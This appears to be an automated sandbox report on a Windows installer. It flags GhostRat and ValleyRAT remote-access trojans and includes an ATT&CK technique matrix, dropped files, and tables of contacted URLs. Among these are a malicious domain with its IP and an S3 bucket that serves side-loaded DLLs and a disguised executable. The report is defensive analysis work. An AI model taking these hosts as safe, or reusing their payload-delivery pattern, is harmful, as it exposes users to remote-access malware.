Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation	Jump to behavior

Source: C:\Windows\explorer.exe

Code function: 12_2_07B56338 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

12_2_07B56338

Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected GhostRat

Source: Yara match	File source: 0000000D.00000002.3135754043.0000000002190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3135862106.000001A3545B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 7812, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 7924, type: MEMORYSTR

Yara detected ValleyRAT

Source: Yara match	File source: Process Memory Space: explorer.exe PID: 7812, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 7924, type: MEMORYSTR

Remote Access Functionality

Yara detected GhostRat

Source: Yara match	File source: 0000000D.00000002.3135754043.0000000002190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3135862106.000001A3545B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 7812, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 7924, type: MEMORYSTR

Yara detected ValleyRAT

Source: Yara match	File source: Process Memory Space: explorer.exe PID: 7812, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 7924, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Replication Through Removable Media	1 Native API	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	31 Input Capture	1 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Windows Service	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	LSASS Memory	11 Peripheral Device Discovery	Remote Desktop Protocol	31 Input Capture	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Scheduled Task/Job	1 Windows Service	1 Obfuscated Files or Information	Security Account Manager	4 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Registry Run Keys / Startup Folder	712 Process Injection	1 Software Packing	NTDS	36 System Information Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Scheduled Task/Job	1 Timestomp	LSA Secrets	31 Security Software Discovery	SSH	Keylogging	3 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Registry Run Keys / Startup Folder	1 DLL Side-Loading	Cached Domain Credentials	41 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	41 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	712 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Rundll32	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	42%	Virustotal		Browse
#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	39%	ReversingLabs

Dropped Files

Source	Detection	Scanner
C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\MSVCP140.dll	0%	ReversingLabs
C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\VCRUNTIME140.dll	0%	ReversingLabs
C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\kitty.exe	0%	ReversingLabs
C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\vcruntime140_1.dll	0%	ReversingLabs
C:\Users\user\8cb0240ffaae4\MSVCP140.dll	0%	ReversingLabs
C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe	0%	ReversingLabs
C:\Users\user\8cb0240ffaae4\VCRUNTIME140.dll	0%	ReversingLabs
C:\Users\user\8cb0240ffaae4\vcruntime140_1.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://priapic.s3.ap-east-1.amazonaws.comD	0%	Avira URL Cloud	safe
https://priapic.s3.ap-east-1.amazonaws.com/statix	0%	Avira URL Cloud	safe
https://priapic.s3.ap-east-1.amazonaws.com/vcruntime140_1.dllT	0%	Avira URL Cloud	safe
https://ppe.assets.activity.windows.com/v1/assets	0%	Avira URL Cloud	safe
https://priapic.s3.ap-east-1.amazonaws.com/static.ini	0%	Avira URL Cloud	safe
https://priapic.s3.ap-east-1.amazonaws.com/view.res	0%	Avira URL Cloud	safe
https://ppe.assets.activity.windows.com/v1/assets/$batch	0%	Avira URL Cloud	safe
https://priapic.s3.ap-east-1.amazonaws.com/UnityPlayer.dll	0%	Avira URL Cloud	safe
https://android.notify.windows.com/iOS9:	0%	Avira URL Cloud	safe
http://www.wosign.com/policy/0	0%	Avira URL Cloud	safe
https://java.c	0%	Avira URL Cloud	safe
https://priapic.s3.ap-east-1.amazonaws.com	0%	Avira URL Cloud	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz	0%	Avira URL Cloud	safe
https://priapic.s3.ap-east-1.amazonaws.com/VCRUNTIME140.dll	0%	Avira URL Cloud	safe
https://priapic.s3.ap-east-1.amazonaws.com/Microsoft_Xtools.exe	0%	Avira URL Cloud	safe
https://activity.windows.comhttps://assets.activity.windows.com/v1/assetshttps://assets.activity.win	0%	Avira URL Cloud	safe
https://priapic.s3.ap-east-1.amazonaws.com/MSVCP140.dll	0%	Avira URL Cloud	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark	0%	Avira URL Cloud	safe
https://priapic.s3.ap-east-1.amazonaws.com/vcruntime140_1.dll	0%	Avira URL Cloud	safe
https://ppe.assets.activity.windows.com	0%	Avira URL Cloud	safe
https://http:///WopiFrame.aspx?	0%	Avira URL Cloud	safe
https://android.notify.windows.com/iOS%2	0%	Avira URL Cloud	safe
https://ppe.activity.windows.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
s3-r-w.ap-east-1.amazonaws.com	3.5.237.40	true	false	high
telegram--www.com	206.238.115.224	true	true	unknown
priapic.s3.ap-east-1.amazonaws.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://priapic.s3.ap-east-1.amazonaws.com/view.res	false	Avira URL Cloud: safe	unknown
https://priapic.s3.ap-east-1.amazonaws.com/static.ini	false	Avira URL Cloud: safe	unknown
https://priapic.s3.ap-east-1.amazonaws.com/UnityPlayer.dll	false	Avira URL Cloud: safe	unknown
https://priapic.s3.ap-east-1.amazonaws.com/Microsoft_Xtools.exe	false	Avira URL Cloud: safe	unknown
https://priapic.s3.ap-east-1.amazonaws.com/VCRUNTIME140.dll	false	Avira URL Cloud: safe	unknown
https://priapic.s3.ap-east-1.amazonaws.com/MSVCP140.dll	false	Avira URL Cloud: safe	unknown
https://priapic.s3.ap-east-1.amazonaws.com/vcruntime140_1.dll	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://aia1.wosign.com/ca1g2.ts.cer0	#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.00000000024F2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ppe.assets.activity.windows.com/v1/assets	Microsoft_Xtools.exe, 00000013.00000003.2304631549.00000187C7E34000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://priapic.s3.ap-east-1.amazonaws.comD	#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.000000000254E000.00000004.00000800.00020000.00000000.sdmp, #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.00000000024A9000.00000004.00000800.00020000.00000000.sdmp, #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.0000000002485000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.activity.windows.com/v1/assets	Microsoft_Xtools.exe, 00000013.00000003.2304631549.00000187C7E34000.00000004.00000020.00020000.00000000.sdmp	false		high
http://aia1.wosign.com/ca1g2-ts.cer0	#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.00000000024F2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF	explorer.exe, 0000000C.00000000.1922009971.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	false		high
https://priapic.s3.ap-east-1.amazonaws.com/vcruntime140_1.dllT	#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.0000000002483000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOS9:	explorer.exe, 0000000C.00000002.3147287649.000000000BE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1927425047.000000000BE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3076302062.000000000BE14000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 0000000C.00000000.1922009971.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	false		high
https://ppe.assets.activity.windows.com/v1/assets/$batch	Microsoft_Xtools.exe, 00000013.00000003.2304631549.00000187C7E34000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://word.office.comZ	explorer.exe, 0000000C.00000002.3147490009.000000000BE53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3076946819.000000000BE52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1927425047.000000000BE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3076302062.000000000BE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3076888030.000000000BE4C000.00000004.00000001.00020000.00000000.sdmp	false		high
http://ns.adobeJH	explorer.exe, 0000000C.00000002.3139180494.0000000004415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1921135374.0000000004415000.00000004.00000001.00020000.00000000.sdmp	false		high
http://ocsp1.wosign.com/ca10/	#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.00000000024F2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://Passport.NET/purpose	Microsoft_Xtools.exe, 00000013.00000003.2304631549.00000187C7E34000.00000004.00000020.00020000.00000000.sdmp	false		high
http://certificates.intel.com/repository/CRL/Intel%20External%20Basic%20Issuing%20CA%203B(1).crl0	#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000000.1281835761.0000000000012000.00000002.00000001.01000000.00000004.sdmp	false		high
https://excel.office.com	explorer.exe, 0000000C.00000002.3147490009.000000000BE53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3076946819.000000000BE52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1927425047.000000000BE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3076302062.000000000BE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3076888030.000000000BE4C000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-	explorer.exe, 0000000C.00000000.1922009971.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.micro	explorer.exe, 0000000C.00000000.1922752589.00000000077A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000002.3141313788.00000000077B0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000002.3141221489.0000000007700000.00000002.00000001.00040000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri	explorer.exe, 0000000C.00000000.1922009971.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	false		high
https://aka.ms/wsl2kernel	Microsoft_Xtools.exe, 00000009.00000003.1781943317.000002A39D4D8000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1775252350.000002A39D4DF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://aka.ms/hcsadmin	Microsoft_Xtools.exe, 00000009.00000003.1781943317.000002A39D4D8000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1775252350.000002A39D4DF000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.wosign.com/policy/0	#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.00000000024F2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://certificates.intel.com/repository/certificates/Intel%20External%20Basic%20Issuing%20CA%203B(1	#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000000.1281835761.0000000000012000.00000002.00000001.01000000.00000004.sdmp	false		high
http://crl.thawte.com/ThawteTimestampingCA.crl0	#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000000.1281835761.0000000000012000.00000002.00000001.01000000.00000004.sdmp	false		high
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 0000000C.00000000.1922009971.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	false		high
https://priapic.s3.ap-east-1.amazonaws.com/statix	#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.0000000002548000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppr	explorer.exe, 0000000C.00000003.3076011751.0000000009453000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3144400656.0000000009455000.00000004.00000001.00020000.00000000.sdmp	false		high
http://crls1.wosign.com/ca1g2-ts.crl0m	#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.00000000024F2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://java.c	explorer.exe, 0000000C.00000002.3148078606.000000000BFFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3075203061.000000000BFFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1928031311.000000000BFFC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu	explorer.exe, 0000000C.00000000.1922009971.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.00000000023C1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://android.notify.windows.com/iOSd	explorer.exe, 0000000C.00000002.3147287649.000000000BE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1927425047.000000000BE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3076302062.000000000BE14000.00000004.00000001.00020000.00000000.sdmp	false		high
http://certificates.intel.com/repository/certificates/Intel%20External%20Basic%20Policy%20CA.crt0	#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000000.1281835761.0000000000012000.00000002.00000001.01000000.00000004.sdmp	false		high
http://www.intel.com/repository/certificates/Intel%20External%20Basic%20Policy%20CA.crt0l	#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000000.1281835761.0000000000012000.00000002.00000001.01000000.00000004.sdmp	false		high
https://priapic.s3.ap-east-1.amazonaws.com	#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.00000000023C1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.overwolf.com	Microsoft_Xtools.exe, 00000009.00000003.1633472393.000002A39B54C000.00000004.00000020.00020000.00000000.sdmp, kitty.exe, 0000000E.00000000.2070770589.00007FF6F46C2000.00000020.00000001.01000000.00000012.sdmp	false		high
http://ocsp1.wosign.com/ca1g2/ts0/	#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.00000000024F2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.thawte.com0	#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000000.1281835761.0000000000012000.00000002.00000001.01000000.00000004.sdmp	false		high
https://www.overwolf.com:	Microsoft_Xtools.exe, 00000009.00000003.1633472393.000002A39B54C000.00000004.00000020.00020000.00000000.sdmp, kitty.exe, 0000000E.00000000.2070814421.00007FF6F46CC000.00000002.00000001.01000000.00000012.sdmp	false		high
http://certificates.intel.com/repository/CRL/Intel%20External%20Basic%20Policy%20CA.crl0	#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000000.1281835761.0000000000012000.00000002.00000001.01000000.00000004.sdmp	false		high
http://www.intel.com/repository/CRL/Intel%20External%20Basic%20Policy%20CA.crl	#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000000.1281835761.0000000000012000.00000002.00000001.01000000.00000004.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz	explorer.exe, 0000000C.00000000.1922009971.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://outlook.comP;	explorer.exe, 0000000C.00000002.3147490009.000000000BE53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3076946819.000000000BE52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1927425047.000000000BE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3076302062.000000000BE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3076888030.000000000BE4C000.00000004.00000001.00020000.00000000.sdmp	false		high
https://wns.windows.com/A	explorer.exe, 0000000C.00000000.1922009971.00000000071CB000.00000004.00000001.00020000.00000000.sdmp	false		high
https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc	explorer.exe, 0000000C.00000000.1922009971.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	false		high
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg	explorer.exe, 0000000C.00000000.1922009971.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	false		high
https://powerpoint.office.com	explorer.exe, 0000000C.00000002.3147287649.000000000BE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1927425047.000000000BE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3076302062.000000000BE14000.00000004.00000001.00020000.00000000.sdmp	false		high
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 0000000C.00000000.1922009971.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-	explorer.exe, 0000000C.00000000.1922009971.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.symauth.com/cps0(	#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.00000000024F2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://%s.xboxlive.com	Microsoft_Xtools.exe, 00000013.00000003.2304631549.00000187C7E34000.00000004.00000020.00020000.00000000.sdmp	false		high
https://activity.windows.comhttps://assets.activity.windows.com/v1/assetshttps://assets.activity.win	Microsoft_Xtools.exe, 00000013.00000003.2304631549.00000187C7E34000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark	explorer.exe, 0000000C.00000000.1922009971.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA	explorer.exe, 0000000C.00000000.1922009971.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	false		high
https://wns.windows.com/G	explorer.exe, 0000000C.00000002.3140182405.00000000071CB000.00000004.00000001.00020000.00000000.sdmp	false		high
http://crls1.wosign.com/ca1.crl0h	#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.00000000024F2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.msn.com/v1/news/Feed/Windows?3	explorer.exe, 0000000C.00000000.1923761492.00000000091E5000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.intel.com/repository/CRL/Intel%20External%20Basic%20Issuing%20CA%203B(1).crl	#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000000.1281835761.0000000000012000.00000002.00000001.01000000.00000004.sdmp	false		high
https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c	explorer.exe, 0000000C.00000000.1922009971.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve	explorer.exe, 0000000C.00000000.1922009971.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	false		high
http://Passport.NET/purposefooKeyVersionTicket	Microsoft_Xtools.exe, 00000013.00000003.2304631549.00000187C7E34000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ppe.assets.activity.windows.com	Microsoft_Xtools.exe, 00000013.00000003.2304631549.00000187C7E34000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.symauth.com/rpa00	#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.00000000024F2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://android.notify.windows.com/iOS	explorer.exe, 0000000C.00000002.3147287649.000000000BE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1927425047.000000000BE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3076302062.000000000BE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3075659085.000000000BF37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3147824505.000000000BF44000.00000004.00000001.00020000.00000000.sdmp	false		high
